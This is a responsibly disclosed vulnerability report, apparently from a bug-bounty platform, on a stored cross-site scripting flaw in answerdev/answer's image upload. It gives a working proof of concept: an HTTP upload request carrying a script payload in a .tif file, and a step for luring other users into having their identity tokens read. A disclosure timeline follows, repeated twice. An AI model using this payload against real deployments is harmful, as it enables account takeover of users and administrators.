Image upload function has storage xss vulnerability in answerdev/answer

Valid

Reported on

Jan 12th 2023

Description

Malicious users can upload files containing malicious html code through this vulnerability, resulting in the theft of identity tokens of other users/administrators accessing related pages and the account being taken over

Proof of Concept

step1. Log in to a common user account
step2. Send the following http request message to upload the image

POST /answer/api/v1/file HTTP/1.1
Host: localhost:9080
Authorization: 5f61e241-91a4-11ed-a458-0242ac110002
Content-Type: multipart/form-data; boundary=---------------------------133113666429484033361737701471
Content-Length: 392

-----------------------------133113666429484033361737701471
Content-Disposition: form-data; name="source"

post
-----------------------------133113666429484033361737701471
Content-Disposition: form-data; name="file"; filename="mini.tif"
Content-Type: image/jpeg

<script>alert(localStorage.getItem('_a_lui_'))</script>

-----------------------------133113666429484033361737701471--

step3. Send the URL(http://localhost:9080/uploads/post/4KdbYyp9F4E.tif) to other users, or publish the URL to the question or answer to induce other users to click. Once another user clicks on the URL, identity tokens are stolen

Impact

We are processing your report and will contact the answerdev/answer team within 24 hours. 2 months ago

Re modified the report

2 months ago

Re modified the report

2 months ago

We have contacted a member of the answerdev/answer team and are waiting to hear back 2 months ago

We have sent a follow up to the answerdev/answer team. We will try again in 7 days. 2 months ago

A answerdev/answer maintainer validated this vulnerability 2 months ago

Re has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

commented 2 months ago

Researcher

Hi Team, Could you help me apply for a CVE ID for this vulnerability？Thanks

commented 2 months ago

Researcher

@admin

A answerdev/answer maintainer marked this as fixed in 1.0.4 with commit 860b1a a month ago

The fix bounty has been dropped

This vulnerability has been assigned a CVE

A answerdev/answer maintainer published this vulnerability a month ago

NCNIPC梅苑

commented 20 days ago

tql

to join this conversation

We are processing your report and will contact the answerdev/answer team within 24 hours. 2 months ago

Re modified the report

2 months ago

Re modified the report

2 months ago

We have contacted a member of the answerdev/answer team and are waiting to hear back 2 months ago

We have sent a follow up to the answerdev/answer team. We will try again in 7 days. 2 months ago

A answerdev/answer maintainer validated this vulnerability 2 months ago

Re has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

commented 2 months ago

Researcher

Hi Team, Could you help me apply for a CVE ID for this vulnerability？Thanks

commented 2 months ago

Researcher

@admin

A answerdev/answer maintainer marked this as fixed in 1.0.4 with commit 860b1a a month ago

The fix bounty has been dropped

This vulnerability has been assigned a CVE

A answerdev/answer maintainer published this vulnerability a month ago

NCNIPC梅苑

commented 20 days ago

tql

to join this conversation